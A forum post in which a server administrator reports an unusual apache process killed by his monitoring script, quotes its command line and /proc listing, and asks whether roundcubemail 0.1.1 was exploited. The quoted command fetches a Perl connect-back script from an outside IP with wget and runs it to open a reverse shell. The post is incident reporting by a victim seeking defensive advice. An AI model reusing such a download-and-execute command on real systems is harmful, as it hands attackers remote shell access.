floyd
Verified User
- Joined
- Mar 29, 2005
- Messages
- 6,168
I have a script that regularly checks for running apache processes that are out of the ordinary. It kills them and lets me know what they were.
I got this today.
Process:
ls -l /proc/28505
Looks like somebody was using roundcube to wget a file. Is this a roundcube vulnerability? Any ideas of what I need to do to secure the server more?
I got this today.
Process:
Code:
apache 28505 0.0 0.0 4528 1084 ? S 08:24 0:00 sh -c wget 64.62.225.99/~jhtech/cback.txt -O /var/tmp/cb.txt;/usr/bin/perl /var/tmp/cb.txt 64.62.225.99 8003
ls -l /proc/28505
Code:
dr-xr-xr-x 2 apache apache 0 Dec 25 08:25 attr
-r-------- 1 apache apache 0 Dec 25 08:25 auxv
-r--r--r-- 1 apache apache 0 Dec 25 08:25 cmdline
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 coredump_filter
-r--r--r-- 1 apache apache 0 Dec 25 08:25 cpuset
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 cwd -> /var/www/html/roundcubemail-0.1.1/bin
-r-------- 1 apache apache 0 Dec 25 08:25 environ
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 exe -> /bin/bash
dr-x------ 2 apache apache 0 Dec 25 08:25 fd
-r-------- 1 apache apache 0 Dec 25 08:25 limits
-r-------- 1 apache apache 0 Dec 25 08:25 limits
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 loginuid
-r--r--r-- 1 apache apache 0 Dec 25 08:25 maps
-rw------- 1 apache apache 0 Dec 25 08:25 mem
-r--r--r-- 1 apache apache 0 Dec 25 08:25 mounts
-r-------- 1 apache apache 0 Dec 25 08:25 mountstats
-rw-r--r-- 1 apache apache 0 Dec 25 08:25 oom_adj
-r--r--r-- 1 apache apache 0 Dec 25 08:25 oom_score
lrwxrwxrwx 1 apache apache 0 Dec 25 08:25 root -> /
-r--r--r-- 1 apache apache 0 Dec 25 08:25 schedstat
-r-------- 1 apache apache 0 Dec 25 08:25 smaps
-r--r--r-- 1 apache apache 0 Dec 25 08:25 stat
-r--r--r-- 1 apache apache 0 Dec 25 08:25 statm
-r--r--r-- 1 apache apache 0 Dec 25 08:25 status
dr-xr-xr-x 3 apache apache 0 Dec 25 08:25 task
-r--r--r-- 1 apache apache 0 Dec 25 08:25 wchan
Looks like somebody was using roundcube to wget a file. Is this a roundcube vulnerability? Any ideas of what I need to do to secure the server more?